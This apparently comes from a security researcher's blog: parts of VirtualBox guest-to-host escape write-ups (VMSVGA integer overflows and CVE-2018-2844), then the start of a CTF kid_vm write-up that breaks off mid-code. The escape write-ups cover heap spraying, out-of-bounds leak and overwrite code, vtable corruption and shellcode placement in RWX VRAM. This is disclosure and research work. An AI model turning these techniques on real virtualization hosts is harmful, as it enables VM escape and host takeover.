        pMipmapLevel->cbSurface      = pMipmapLevel->cbSurfacePitch * pMipmapLevel->size.height * pMipmapLevel->size.depth;
        pMipmapLevel->pSurfaceData   = RTMemAllocZ(pMipmapLevel->cbSurface);
        AssertReturn(pMipmapLevel->pSurfaceData, VERR_NO_MEMORY);
    }
 . . .
}
Bugs in vmsvga3dSurfaceDefine() allow setting very large values for pMipmapLevel->size.width, pMipmapLevel->size.height and pMipmapLevel->size.depth while still allocating heap chunks of only the desired size. This is very useful for further exploiting the integer overflows in vmsvga3dSurfaceDMA().

int vmsvga3dSurfaceDMA(PVGASTATE pThis, SVGA3dGuestImage guest, SVGA3dSurfaceImageId host, SVGA3dTransferType transfer,
                       uint32_t cCopyBoxes, SVGA3dCopyBox *paBoxes)
{
. . .
        for (unsigned i = 0; i < cCopyBoxes; i++)    
        {
            . . .  
            /* Apparently we're supposed to clip it (gmr test sample) */
            if (paBoxes[i].x + paBoxes[i].w > pMipLevel->size.width)
                paBoxes[i].w = pMipLevel->size.width - paBoxes[i].x;
            if (paBoxes[i].y + paBoxes[i].h > pMipLevel->size.height)
                paBoxes[i].h = pMipLevel->size.height - paBoxes[i].y;
            if (paBoxes[i].z + paBoxes[i].d > pMipLevel->size.depth)
                paBoxes[i].d = pMipLevel->size.depth - paBoxes[i].z;

            if (    !paBoxes[i].w
                ||  !paBoxes[i].h
                ||  !paBoxes[i].d
                ||   paBoxes[i].x > pMipLevel->size.width
                ||   paBoxes[i].y > pMipLevel->size.height
                ||   paBoxes[i].z > pMipLevel->size.depth)
            {
                . . .
                continue;
            }
. . .
            uDestOffset = paBoxes[i].x * pSurface->cbBlock + paBoxes[i].y * pMipLevel->cbSurfacePitch + paBoxes[i].z * pMipLevel->size.height * pMipLevel->cbSurfacePitch;
            AssertReturn(uDestOffset + paBoxes[i].w * pSurface->cbBlock * paBoxes[i].h * paBoxes[i].d <= pMipLevel->cbSurface, VERR_INTERNAL_ERROR);
. . .
            rc = vmsvgaGMRTransfer(pThis,
                                   transfer,
. . .
                                   paBoxes[i].w * pSurface->cbBlock,
                                   paBoxes[i].d * paBoxes[i].h);
. . .
}
The first set of checks involving paBoxes can be bypassed, since the pMipLevel width, height and depth are set to very large values in vmsvga3dSurfaceDefine(). Later these values are used for calculating ‘uDestOffset’, which can therefore be set to an arbitrary value.

uDestOffset = paBoxes[i].x * pSurface->cbBlock + paBoxes[i].y * pMipLevel->cbSurfacePitch + paBoxes[i].z * pMipLevel->size.height * pMipLevel->cbSurfacePitch;
However, there is a validation following this:
            AssertReturn(uDestOffset + paBoxes[i].w * pSurface->cbBlock * paBoxes[i].h * paBoxes[i].d <= pMipLevel->cbSurface, VERR_INTERNAL_ERROR);

i.e. uDestOffset + ((paBoxes[i].w * pSurface->cbBlock) * (paBoxes[i].h * paBoxes[i].d)) <= pMipLevel->cbSurface
Here one can set high values to either uDestOffset or (paBoxes[i].w * pSurface->cbBlock) or (paBoxes[i].h * paBoxes[i].d) to bypass the validation. In vmsvgaGMRTransfer(), (paBoxes[i].w * pSurface->cbBlock) and (paBoxes[i].h * paBoxes[i].d) are used in computing size arguments for memcpy() call. To keep sizes to sane values, let’s set uDestOffset to a large value, thus allowing read/write at an offset ~4GB from a surface allocation.

There are two problems which need to be solved in order to exploit this bug:
- Allocate the memory at offset ~4GB from a surface allocation
- The memory allocated at this huge offset should have interesting pointers to corrupt which could lead to code execution

In OSX, there are three types of allocations – tiny, small and large. For more details on the allocator, refer to the previous work [9] and [10]. Tiny and small heap allocations fall in the address range 0x00007fxxxxx00000, whereas large allocations occupy another address range, 0x00000001xxxxx000. Either of these heap allocation types can be targeted to exploit this bug.

My choice was to target the tiny and small heap allocations. This is primarily because I was aware of tiny allocations holding pointers to vtables and other memory allocations, which could be corrupted for code execution. However, spraying the entire 4GB of memory with tiny allocations is a very slow process. OSX supports small allocations up to a size of 127KB. So the idea is to allocate as many small chunks as possible to speed up the heap spray, and to use a smaller amount of heap spray with tiny chunks.

Allocating tiny chunks:

For tiny chunks I targeted the allocations performed by HGCM (Host-Guest Communication Manager). A good amount of detail about HGCM can be found in [11]. For this exploit, I used HGCM connection objects for spraying. HGCM connections are initialized using the VMM virtual PCI device. The BAR0 of the device holds the I/O port address used for HGCM communication. Whenever an HGCM connection is initiated, an HGCMClient object of size 72 bytes is allocated in memory and a client ID is returned. This is what the HGCMClient object looks like:

typedef struct _AVLULNodeCore
{
    AVLULKEY                Key;        /** Key value. */
    struct _AVLULNodeCore  *pLeft;      /** Pointer to left leaf node. */
    struct _AVLULNodeCore  *pRight;     /** Pointer to right leaf node. */
    unsigned char           uchHeight;  /** Height of this tree: max(height(left), height(right)) + 1 */
} AVLULNODECORE, *PAVLULNODECORE, **PPAVLULNODECORE;

typedef struct _ObjectAVLCore
{
    AVLULNODECORE AvlCore;
    void *pSelf;                        // type HGCMObject
} ObjectAVLCore;

struct HGCMClient {
        void *vptr_HGCMObject;
        uint32_t m_cRefs;
        uint32_t m_enmObjType;          // HGCMOBJ_TYPE enum
        ObjectAVLCore m_core;
        void *pService;                 // type HGCMService
        void *pvData;
        uint64_t padding;
} HGCMClient;
Creation and allocation of HGCMClient objects are done by HGCMService::CreateAndConnectClient in src/VBox/Main/src-client/HGCM.cpp. The client objects are maintained using an AVL tree. The nodes have client IDs as keys and also hold a pointer to the object itself. During exploitation, we avoid corrupting the AVL tree metadata to prevent any crashes during lookup or insertion of AVL tree nodes. Further, the vtable of HGCMClient can be corrupted for gaining RIP control.

The deletion of HGCMClient objects happens during HGCM disconnect, which is handled by HGCMService::DisconnectClient where the corrupted vtable gets used.

int HGCMService::DisconnectClient(uint32_t u32ClientId, bool fFromService)
{
. . .
            HGCMMsgSvcDisconnect *pMsg = (HGCMMsgSvcDisconnect *)hgcmObjReference(hMsg, HGCMOBJ_MSG);
            AssertRelease(pMsg);

            pMsg->u32ClientId = u32ClientId;

            hgcmObjDereference(pMsg);  // use of corrupted vtable on deletion
. . .
}

Allocating small chunks:

In order to fill 4GB, small chunks are a much faster option compared to tiny chunks. The SVGA_3D_CMD_SURFACE_DEFINE command can be used to allocate chunks of arbitrary size.

int vmsvga3dSurfaceDefine(PVGASTATE pThis, uint32_t sid, uint32_t surfaceFlags, SVGA3dSurfaceFormat format,
                          SVGA3dSurfaceFace face[SVGA3D_MAX_SURFACE_FACES], uint32_t multisampleCount,
                          SVGA3dTextureFilter autogenFilter, uint32_t cMipLevels, SVGA3dSize *paMipLevelSizes)
{
. . .
    AssertReturn(sid < SVGA3D_MAX_SURFACE_IDS, VERR_INVALID_PARAMETER);
. . .
    pSurface = pState->papSurfaces[sid];

    /* If one already exists with this id, then destroy it now. */
    if (pSurface->id != SVGA3D_INVALID_ID)
        vmsvga3dSurfaceDestroy(pThis, sid);
. . .
}
vmsvga3dSurfaceDefine() allows a maximum of SVGA3D_MAX_SURFACE_IDS (32 * 1024) unique surface allocations. With surfaces of size 127KB, this is a good enough limit to fill ~4GB of memory. Since the pages were allocated towards the lower addresses of the heap, the HGCMClient objects are allocated first, followed by the surface allocations. This is what the memory layout looks like before and after the heap spray:
Memory layout before spray:


Stack                  00007000060c1000-0000700006143000           thread 29
MALLOC_TINY            00007ff16b400000-00007ff16b500000 [ 1024K   684K   684K   316K] rw-/rwx SM=PRV          DefaultMallocZone_0x106b7d000
MALLOC_TINY            00007ff16b500000-00007ff16b700000 [ 2048K   792K   792K  1256K] rw-/rwx SM=COW          DefaultMallocZone_0x106b7d000
MALLOC_TINY            00007ff16b700000-00007ff16b800000 [ 1024K   840K   840K   184K] rw-/rwx SM=PRV          DefaultMallocZone_0x106b7d000
MALLOC_SMALL           00007ff16b800000-00007ff16c06d000 [ 8628K  1332K  1332K  2160K] rw-/rwx SM=COW          DefaultMallocZone_0x106b7d000
MALLOC_SMALL (empty)   00007ff16c06d000-00007ff16c06e000 [    4K     4K     4K     0K] rw-/rwx SM=PRV          DefaultMallocZone_0x106b7d000
MALLOC_SMALL           00007ff16c06e000-00007ff16d800000 [ 23.6M  2600K  2600K  4288K] rw-/rwx SM=COW          DefaultMallocZone_0x106b7d000
MALLOC_TINY            00007ff16d800000-00007ff16d900000 [ 1024K   484K   484K   540K] rw-/rwx SM=PRV          DefaultMallocZone_0x106b7d000
MALLOC_TINY            00007ff16d900000-00007ff16da00000 [ 1024K   364K   364K   660K] rw-/rwx SM=COW          DefaultMallocZone_0x106b7d000
MALLOC_TINY            00007ff16da00000-00007ff16dc00000 [ 2048K    20K    20K    12K] rw-/rwx SM=COW          QuartzCore_0x10cc46000
MALLOC_TINY            00007ff16dc00000-00007ff16de00000 [ 2048K    20K    20K    24K] rw-/rwx SM=COW          GFXMallocZone_0x107072000
MALLOC_TINY (empty)    00007ff16de00000-00007ff16df00000 [ 1024K     8K     8K     8K] rw-/rwx SM=COW          GFXMallocZone_0x107072000
MALLOC_TINY            00007ff16df00000-00007ff16e000000 [ 1024K   448K   448K   492K] rw-/rwx SM=COW          DefaultMallocZone_0x106b7d000
MALLOC_SMALL (empty)   00007ff16e000000-00007ff16e800000 [ 8192K     4K     4K     8K] rw-/rwx SM=COW          QuartzCore_0x10cc46000
MALLOC_SMALL           00007ff16e800000-00007ff16f000000 [ 8192K     8K     8K   240K] rw-/rwx SM=COW          GFXMallocZone_0x107072000
MALLOC_SMALL (empty)   00007ff16f000000-00007ff170000000 [ 16.0M     8K     8K   172K] rw-/rwx SM=COW          GFXMallocZone_0x107072000
MALLOC_TINY (empty)    00007ff170000000-00007ff170100000 [ 1024K     8K     8K     4K] rw-/rwx SM=COW          QuartzCore_0x10cc46000
MALLOC_TINY            00007ff170100000-00007ff170200000 [ 1024K   368K   368K    60K] rw-/rwx SM=COW          DefaultMallocZone_0x106b7d000
MALLOC_TINY (empty)    00007ff170200000-00007ff170300000 [ 1024K     8K     8K     4K] rw-/rwx SM=COW          QuartzCore_0x10cc46000
MALLOC_TINY            00007ff170300000-00007ff170400000 [ 1024K     4K     4K    20K] rw-/rwx SM=COW          GFXMallocZone_0x107072000
MALLOC_TINY            00007ff170400000-00007ff170600000 [ 2048K    84K    84K   948K] rw-/rwx SM=COW          DefaultMallocZone_0x106b7d000
MALLOC_SMALL           00007ff170800000-00007ff171000000 [ 8192K     4K     4K    96K] rw-/rwx SM=COW          GFXMallocZone_0x107072000
MALLOC_SMALL           00007ff171000000-00007ff171800000 [ 8192K     4K     4K     8K] rw-/rwx SM=COW          QuartzCore_0x10cc46000
STACK GUARD            00007ffee50b0000-00007ffee88b0000 [ 56.0M     0K     0K     0K] ---/rwx SM=NUL          stack guard for thread 0

Memory layout after spray:


Stack                  000070000624a000-00007000062cc000 [  520K    12K    12K     0K] rw-/rwx SM=PRV          thread 35
MALLOC_SMALL           00007ff06b800000-00007ff079800000 [224.0M 209.3M 209.3M     0K] rw-/rwx SM=COW          DefaultMallocZone_0x106b7d000
MALLOC_SMALL           00007ff07b800000-00007ff08b000000 [248.0M 243.4M 243.4M     0K] rw-/rwx SM=COW          DefaultMallocZone_0x106b7d000
MALLOC_TINY            00007ff08b400000-00007ff08b500000 [ 1024K   244K   244K     0K] rw-/rwx SM=PRV          DefaultMallocZone_0x106b7d000
MALLOC_SMALL           00007ff08b800000-00007ff0c2800000 [880.0M 863.7M 863.7M     0K] rw-/rwx SM=COW          DefaultMallocZone_0x106b7d000
MALLOC_SMALL           00007ff0c2800000-00007ff0c3000000 [ 8192K  8032K  8032K     0K] rw-/rwx SM=PRV          DefaultMallocZone_0x106b7d000
MALLOC_SMALL           00007ff0c3000000-00007ff0ec800000 [664.0M 532.9M 532.9M 118.8M] rw-/rwx SM=COW          DefaultMallocZone_0x106b7d000
MALLOC_SMALL           00007ff0ec800000-00007ff0ed000000 [ 8192K  8032K  8032K     0K] rw-/rwx SM=PRV          DefaultMallocZone_0x106b7d000
MALLOC_SMALL           00007ff0ed000000-00007ff0fb000000 [224.0M 217.3M 217.3M  2588K] rw-/rwx SM=COW          DefaultMallocZone_0x106b7d000
MALLOC_TINY            00007ff0fb400000-00007ff0fb500000 [ 1024K   184K   184K     0K] rw-/rwx SM=PRV          DefaultMallocZone_0x106b7d000
MALLOC_SMALL           00007ff0fb800000-00007ff12b000000 [760.0M 745.9M 745.9M     0K] rw-/rwx SM=COW          DefaultMallocZone_0x106b7d000
MALLOC_TINY            00007ff12b400000-00007ff12b500000 [ 1024K   936K   936K     4K] rw-/rwx SM=PRV          DefaultMallocZone_0x106b7d000
MALLOC_SMALL           00007ff12b800000-00007ff139000000 [216.0M 212.0M 212.0M     0K] rw-/rwx SM=COW          DefaultMallocZone_0x106b7d000
MALLOC_SMALL           00007ff139000000-00007ff139800000 [ 8192K  8032K  8032K     0K] rw-/rwx SM=PRV          DefaultMallocZone_0x106b7d000
MALLOC_SMALL           00007ff139800000-00007ff13b000000 [ 24.0M  23.6M  23.6M     0K] rw-/rwx SM=COW          DefaultMallocZone_0x106b7d000
MALLOC_TINY            00007ff13b400000-00007ff13b500000 [ 1024K  1016K  1016K     8K] rw-/rwx SM=PRV          DefaultMallocZone_0x106b7d000
MALLOC_SMALL           00007ff13b800000-00007ff16b000000 [760.0M 745.9M 745.9M     0K] rw-/rwx SM=COW          DefaultMallocZone_0x106b7d000
MALLOC_TINY            00007ff16b400000-00007ff16b800000 [ 4096K  2464K  2464K  1632K] rw-/rwx SM=PRV          DefaultMallocZone_0x106b7d000
MALLOC_SMALL           00007ff16b800000-00007ff16c06d000 [ 8628K  6592K  6592K  1828K] rw-/rwx SM=COW          DefaultMallocZone_0x106b7d000
MALLOC_SMALL (empty)   00007ff16c06d000-00007ff16c06e000 [    4K     4K     4K     0K] rw-/rwx SM=PRV          DefaultMallocZone_0x106b7d000
MALLOC_SMALL           00007ff16c06e000-00007ff16d000000 [ 15.6M  14.0M  14.0M  1440K] rw-/rwx SM=COW          DefaultMallocZone_0x106b7d000
MALLOC_SMALL           00007ff16d000000-00007ff16d800000 [ 8192K  5608K  5608K  2312K] rw-/rwx SM=PRV          DefaultMallocZone_0x106b7d000
MALLOC_TINY            00007ff16d800000-00007ff16da00000 [ 2048K   864K   864K  1184K] rw-/rwx SM=PRV          DefaultMallocZone_0x106b7d000
MALLOC_TINY            00007ff16da00000-00007ff16dc00000 [ 2048K    24K    24K     8K] rw-/rwx SM=COW          QuartzCore_0x10cc46000
MALLOC_TINY            00007ff16dc00000-00007ff16de00000 [ 2048K    20K    20K    24K] rw-/rwx SM=COW          GFXMallocZone_0x107072000
MALLOC_TINY (empty)    00007ff16de00000-00007ff16df00000 [ 1024K     8K     8K     8K] rw-/rwx SM=COW          GFXMallocZone_0x107072000
MALLOC_TINY            00007ff16df00000-00007ff16e000000 [ 1024K   940K   940K    84K] rw-/rwx SM=PRV          DefaultMallocZone_0x106b7d000
MALLOC_SMALL (empty)   00007ff16e000000-00007ff16e800000 [ 8192K     4K     4K     8K] rw-/rwx SM=COW          QuartzCore_0x10cc46000
MALLOC_SMALL           00007ff16e800000-00007ff16f000000 [ 8192K     8K     8K   240K] rw-/rwx SM=COW          GFXMallocZone_0x107072000
MALLOC_SMALL (empty)   00007ff16f000000-00007ff170000000 [ 16.0M     8K     8K   172K] rw-/rwx SM=COW          GFXMallocZone_0x107072000
MALLOC_TINY (empty)    00007ff170000000-00007ff170100000 [ 1024K     8K     8K     4K] rw-/rwx SM=COW          QuartzCore_0x10cc46000
MALLOC_TINY            00007ff170100000-00007ff170200000 [ 1024K   988K   988K    36K] rw-/rwx SM=PRV          DefaultMallocZone_0x106b7d000
MALLOC_TINY (empty)    00007ff170200000-00007ff170300000 [ 1024K     8K     8K     4K] rw-/rwx SM=COW          QuartzCore_0x10cc46000
MALLOC_TINY            00007ff170300000-00007ff170400000 [ 1024K     4K     4K    20K] rw-/rwx SM=COW          GFXMallocZone_0x107072000
MALLOC_TINY            00007ff170400000-00007ff170500000 [ 1024K  1024K  1024K     0K] rw-/rwx SM=PRV          DefaultMallocZone_0x106b7d000
MALLOC_TINY            00007ff170500000-00007ff170800000 [ 3072K  3072K  3072K     0K] rw-/rwx SM=COW          DefaultMallocZone_0x106b7d000
MALLOC_SMALL           00007ff170800000-00007ff171000000 [ 8192K     4K     4K    96K] rw-/rwx SM=COW          GFXMallocZone_0x107072000
MALLOC_SMALL           00007ff171000000-00007ff171800000 [ 8192K     8K     8K     4K] rw-/rwx SM=COW          QuartzCore_0x10cc46000
MALLOC_TINY            00007ff171800000-00007ff172a00000 [ 18.0M  18.0M  18.0M     0K] rw-/rwx SM=COW          DefaultMallocZone_0x106b7d000
MALLOC_TINY            00007ff172a00000-00007ff172b00000 [ 1024K  1024K  1024K     0K] rw-/rwx SM=PRV          DefaultMallocZone_0x106b7d000
MALLOC_TINY            00007ff172b00000-00007ff173800000 [ 13.0M  13.0M  13.0M     0K] rw-/rwx SM=COW          DefaultMallocZone_0x106b7d000
MALLOC_TINY            00007ff173800000-00007ff173900000 [ 1024K  1024K  1024K     0K] rw-/rwx SM=PRV          DefaultMallocZone_0x106b7d000
MALLOC_TINY            00007ff173900000-00007ff174800000 [ 15.0M  15.0M  15.0M     0K] rw-/rwx SM=COW          DefaultMallocZone_0x106b7d000
MALLOC_TINY            00007ff174800000-00007ff174900000 [ 1024K  1024K  1024K     0K] rw-/rwx SM=PRV          DefaultMallocZone_0x106b7d000
MALLOC_TINY            00007ff174900000-00007ff174b00000 [ 2048K  2048K  2048K     0K] rw-/rwx SM=COW          DefaultMallocZone_0x106b7d000
MALLOC_TINY            00007ff174b00000-00007ff174c00000 [ 1024K  1024K  1024K     0K] rw-/rwx SM=PRV          DefaultMallocZone_0x106b7d000
MALLOC_TINY            00007ff174c00000-00007ff175000000 [ 4096K  4096K  4096K     0K] rw-/rwx SM=COW          DefaultMallocZone_0x106b7d000
MALLOC_TINY            00007ff175000000-00007ff175100000 [ 1024K  1024K  1024K     0K] rw-/rwx SM=PRV          DefaultMallocZone_0x106b7d000
MALLOC_TINY            00007ff175100000-00007ff175b00000 [ 10.0M  10.0M  10.0M     0K] rw-/rwx SM=COW          DefaultMallocZone_0x106b7d000
MALLOC_TINY            00007ff175b00000-00007ff175c00000 [ 1024K  1024K  1024K     0K] rw-/rwx SM=PRV          DefaultMallocZone_0x106b7d000
MALLOC_TINY            00007ff175c00000-00007ff176600000 [ 10.0M  10.0M  10.0M     0K] rw-/rwx SM=COW          DefaultMallocZone_0x106b7d000
MALLOC_TINY            00007ff176600000-00007ff176900000 [ 3072K  2352K  2352K     0K] rw-/rwx SM=PRV          DefaultMallocZone_0x106b7d000
MALLOC_SMALL           00007ff177000000-00007ff17b000000 [ 64.0M  62.8M  62.8M     0K] rw-/rwx SM=COW          DefaultMallocZone_0x106b7d000
STACK GUARD            00007ffee50b0000-00007ffee88b0000 [ 56.0M     0K     0K     0K] ---/rwx SM=NUL          stack guard for thread 0

Locating and overwriting HGCMClient Object:

Once the heap spray is done, use the out-of-bounds read to leak memory relative to the surfaces, starting from SVGA3D_MAX_SURFACE_IDS – 1. If an HGCMClient is found, stop the search; otherwise keep going.
/* leak memory */
        for (int i = SVGA3D_MAX_SURFACE_IDS - 1; i >= 0; i--) {
                access_memory(i, SVGA3D_READ_HOST_VRAM, memory, 0x1000);
                rv = find_hgcm_client(memory, 0x1000, &details);
                if (rv == 0) {
                        surface_id = i;
                        break;
                }
        }
Once the client object is found, we know the location of the object by leaking its ‘pSelf’ pointer. The object’s vtable pointer points into VBoxC.dylib. Both of these can be used to break ASLR. Then corrupt the object using the out-of-bounds write relative to the surface id found during the search.
        access_memory(surface_id, SVGA3D_WRITE_HOST_VRAM, memory, 0x1000);
Finally, use HGCM disconnect to use the corrupted HGCMClient as below:
        warnx("[+] Triggering payload...");
        disconnect_client(details.key);

Environment:

Guest: Ubuntu Server 16.04.5 64-bit with single vCPU and VMSVGA enabled
Host: MacOS High Sierra 10.13.6. Note that MacOS Mojave does not support older versions of VirtualBox
VirtualBox: Version 5.1.22 r115126

Exploit took around 3 minutes to complete due to the heap spray involved. The proof-of-concept exploit code and other code can be found at virtualbox-vmsvga-bugs



References and further readings:

[1] GPU Virtualization on VMware’s Hosted I/O Architecture
[2] VMware SVGA Device Interface and Programming Model
[3] CLOUDBURST - A VMware Guest to Host Escape Story
[4] Attacking hypervisors through hardware emulation
[5] VBoxManage
[6] Oracle Critical Patch Update Advisory - January 2015
[7] Oracle Critical Patch Update Advisory - July 2017
[8] Oracle Critical Patch Update Advisory - October 2017
[9] Heapple Pie - The macOS/iOS default heap
[10] In the Zone: OS X Heap Exploitation
[11] Thinking outside the VirtualBox

Tuesday, August 28, 2018

From Compiler Optimization to Code Execution - VirtualBox VM Escape - CVE-2018-2844

Oracle fixed some of the issues I reported in VirtualBox during the Oracle Critical Patch Update - April 2018. CVE-2018-2844 was an interesting double fetch vulnerability in VirtualBox Video Acceleration (VBVA) feature affecting Linux hosts. VBVA feature works on top of VirtualBox Host-Guest Shared Memory Interface (HGSMI), a shared memory implemented using Video RAM buffer. The VRAM buffer is at physical address 0xE0000000
sudo lspci -vvv

00:02.0 VGA compatible controller: InnoTek Systemberatung GmbH VirtualBox Graphics Adapter (prog-if 00 [VGA controller])
 ...
 Interrupt: pin A routed to IRQ 10
 Region 0: Memory at e0000000 (32-bit, prefetchable) [size=16M]
 Expansion ROM at  [disabled]
 Kernel modules: vboxvideo
The guest sets up command buffer using HGSMI as below and writes the offset in VRAM to IO port VGA_PORT_HGSMI_GUEST (0x3d0) to notify the host.
 HGSMIBUFFERHEADER header; 
 uint8_t data[header.u32BufferSize]; 
 HGSMIBUFFERTAIL tail;
The bug specifically occurs in code handling Video DMA (VDMA) commands passed from Guest to Host. The VDMA command handling function vboxVDMACmdExec() dispatches to specific functions based on VDMA command types. This is implemented as switch case statements.
static int
vboxVDMACmdExec(PVBOXVDMAHOST pVdma, const uint8_t *pvBuffer, uint32_t cbBuffer)
{
 /* pvBuffer is shared memory in VRAM */
        PVBOXVDMACMD pCmd = (PVBOXVDMACMD)pvBuffer;

        switch (pCmd->enmType) {
                case VBOXVDMACMD_TYPE_CHROMIUM_CMD: {
                        ...
                }
                case VBOXVDMACMD_TYPE_DMA_PRESENT_BLT: {
                        ...
                }
                case VBOXVDMACMD_TYPE_DMA_BPB_TRANSFER: {
                        ...
                }
                case VBOXVDMACMD_TYPE_DMA_NOP: {
                        ...
                }
                case VBOXVDMACMD_TYPE_CHILD_STATUS_IRQ: {
                        ...
                }
                default: {
                         ...
                }
        }
}
The compiler optimizes the switch cases to jump tables. This is what it looks like after optimization:
; first fetch happens for cmp
.text:00000000000B957A                 cmp     dword ptr [r12], 0Ah ; switch 11 cases
.text:00000000000B957F                 ja      VBOXVDMACMD_TYPE_DEFAULT ; jumptable 00000000000B9597 default case

; second fetch again for pCmd->enmType from shared memory
.text:00000000000B9585                 mov     eax, [r12]
.text:00000000000B9589                 lea     rbx, vboxVDMACmdExec_JMPS
.text:00000000000B9590                 movsxd  rax, dword ptr [rbx+rax*4]
.text:00000000000B9594                 add     rax, rbx
.text:00000000000B9597                 jmp     rax             ; switch jump
.rodata:0000000000185538 vboxVDMACmdExec_JMPS dd offset VBOXVDMACMD_TYPE_DEFAULT - 185538h
.rodata:0000000000185538                                         ; DATA XREF: vboxVDMACommand+1D9o
.rodata:0000000000185538                 dd offset VBOXVDMACMD_TYPE_DMA_PRESENT_BLT - 185538h ; jump table for switch statement
.rodata:0000000000185538                 dd offset VBOXVDMACMD_TYPE_DMA_BPB_TRANSFER - 185538h
.rodata:0000000000185538                 dd offset VBOXVDMACMD_TYPE_DEFAULT - 185538h
.rodata:0000000000185538                 dd offset VBOXVDMACMD_TYPE_DEFAULT - 185538h
.rodata:0000000000185538                 dd offset VBOXVDMACMD_TYPE_DEFAULT - 185538h
.rodata:0000000000185538                 dd offset VBOXVDMACMD_TYPE_DEFAULT - 185538h
.rodata:0000000000185538                 dd offset VBOXVDMACMD_TYPE_DMA_NOP - 185538h
.rodata:0000000000185538                 dd offset VBOXVDMACMD_TYPE_DMA_NOP - 185538h
.rodata:0000000000185538                 dd offset VBOXVDMACMD_TYPE_DEFAULT - 185538h
.rodata:0000000000185538                 dd offset VBOXVDMACMD_TYPE_DMA_NOP - 185538h
.rodata:0000000000185564                 align 20h
The issue is quite clear: it's a TOCTOU bug. Since the variable is not marked volatile, GCC optimizations resulted in a double fetch from shared VRAM memory. I didn't see such an optimization in VirtualBox for Windows and OSX; only Linux hosts are affected.

Note that this kind of issue is not new. There is prior research, Xenpwn - Breaking Paravirtualized Devices by Felix Wilhelm, on a similar issue found in Xen.

Exploitation:

Though the race window is really small, it can be reliably won on guests having more than one vCPU.
 RAX  0xdeadbeef
 RBX  0x7fff8abf2538 ◂— rol    byte ptr [rdx - 0xd], 1
 RCX  0x7fff9c508ac0 —▸ 0x7ffff7e30000 ◂— 0x5
 RDX  0xe7b
 RDI  0xeeb
 RSI  0x7fffdc022000 ◂— xor    byte ptr [rax], al /* 0xffe40030; '0' */
 R8   0x7fff89d20000 ◂— jmp    0x7fff89d20010 /* 0xb020000000eeb */
 R9   0x7fff8ab06040 ◂— push   rbp
 R10  0x7fff9c50ad48 ◂— 0x1 
 R11  0x7fff9c508d48 ◂— 0x0
 R12  0x7fff89d20078 ◂— 0xa /* '\n' */ 
 R13  0xf3b
 R14  0x7fff9c50d0e0 —▸ 0x7fff9c508ac0 —▸ 0x7ffff7e30000 ◂— 0x5
 R15  0x7fff89d20030 ◂— 0xffffffdc0f3b0eeb
 RBP  0x7fffba44dc40 —▸ 0x7fffba44dca0 —▸ 0x7fffba44dce0 —▸ 0x7fffba44dd00 —▸ 0x7fffba44dd50 ◂— ...
 RSP  0x7fffba44db80 —▸ 0x7fffba44dbb0 —▸ 0x7fff9c508ac0 —▸ 0x7ffff7e30000 ◂— 0x5
 RIP  0x7fff8ab26590 ◂— movsxd rax, dword ptr [rbx + rax*4]


 ► 0x7fff8ab26590    movsxd rax, dword ptr [rbx + rax*4]
   0x7fff8ab26594    add    rax, rbx
   0x7fff8ab26597    jmp    rax
RAX is controlled by the guest. R8, R12 and R15 point to offsets within the HGSMI buffer during the crash. The jump table uses relative addressing, hence one cannot directly call into a pointer. The first plan was to find a feature which allows writing a controlled value into VBoxDD.so from the guest and then use it as a fake jump table. However, I failed to find one.

The next option is to jump directly into the VRAM buffer, which is mapped with RWX permissions, using whatever value is available as a fake jump table entry.
    // VRAM buffer
    0x7fff88d21000     0x7fff89d21000 rwxp  1000000 0

    
    // VBoxDD.so
    0x7fff8aa6d000     0x7fff8adff000 r-xp   392000 0      /usr/lib/virtualbox/VBoxDD.so
    0x7fff8adff000     0x7fff8afff000 ---p   200000 392000 /usr/lib/virtualbox/VBoxDD.so
    0x7fff8afff000     0x7fff8b010000 r--p    11000 392000 /usr/lib/virtualbox/VBoxDD.so
    0x7fff8b010000     0x7fff8b018000 rw-p     8000 3a3000 /usr/lib/virtualbox/VBoxDD.so
Find a value in VBoxDD.so (treated as a fake jump table entry) which, during the relative address calculation, will point into the 16MB shared VRAM buffer. For the proof-of-concept exploit, fill the entire VRAM with NOPs and place the shellcode in the final pages of the mapping. No ASLR bypass is needed since the jump is relative.

In the guest, add vboxvideo to /etc/modprobe.d/blacklist.conf. vboxvideo.ko driver has a custom allocator to manage VRAM memory and HGSMI guest side implementations. Blacklisting vboxvideo reduces activity on VRAM and keeps the payload intact. The exploit was tested with Ubuntu Server 16.04.3 64-bit as guest and Ubuntu Desktop 16.04.4 64-bit as host running VirtualBox 5.2.6.r120293.

The proof-of-concept exploit code with process continuation and connect back over network can be found at virtualbox-cve-2018-2844



References:

[1] Xenpwn - Breaking Paravirtualized Devices by Felix Wilhelm
[2] SSD Advisory – Oracle VirtualBox Multiple Guest to Host Escape Vulnerabilities by Niklas Baumstark
[3] VM escape - QEMU Case Study by Mehdi Talbi & Paul Fariello
[4] Xen Security Advisory CVE-2015-8550 / XSA-155
[5] Oracle Critical Patch Update Advisory - April 2018

Saturday, August 11, 2018

Real World CTF - kid_vm

kid_vm is a KVM API based challenge. The provided user space binary uses KVM ioctl calls to set up the guest and execute guest code in 16-bit real mode. The binary comes with the following mitigations:
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
The guest code is copied to a page allocated using mmap. The KVM_SET_USER_MEMORY_REGION call then sets up guest memory with the guest physical address starting at 0 and the backing memory pointing to the mmap’ed page.
       
        guest_memory = mmap(0, 0x10000, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0);
        if (!guest_memory) {
                perror("Mmap fail");
                return 1;
        }

        /* copy guest code */
        memcpy(guest_memory, guest, sizeof(guest));

        region.slot = 0;
        region.guest_phys_addr = 0;
        region.memory_size = 0x10000;
        region.userspace_addr = (uint64_t) guest_memory;

        if (ioctl(vm, KVM_SET_USER_MEMORY_REGION, &region) == -1) {
The user space code also sets KVM_GUESTDBG_SINGLESTEP, which causes a VM exit (KVM_EXIT_DEBUG) on each step. KVM doesn't seem to notify userspace code on a VM exit caused by vmcall. Single stepping looks like a workaround to detect the vmcall instruction.
        memset(&debug, 0, sizeof(debug));
        debug.control = KVM_GUESTDBG_ENABLE | KVM_GUESTDBG_SINGLESTEP;

        if (ioctl(vcpu, KVM_SET_GUEST_DEBUG, &debug) < 0) {
                perror("Fail");
                return 1;
        }
The next interesting part of code is the user space VM exit handler
    switch (run->exit_reason) {

        case KVM_EXIT_IO:
            if (run->io.direction == KVM_EXIT_IO_OUT && run->io.size == 1
                         && run->io.port == 23 && run->ex.error_code == 1) {

                putchar(*((char *)run + run->io.data_offset));
                continue;
            }

            if (run->io.direction == KVM_EXIT_IO_IN && run->io.size == 1
                            && run->io.port == 23 && run->ex.error_code == 1) {

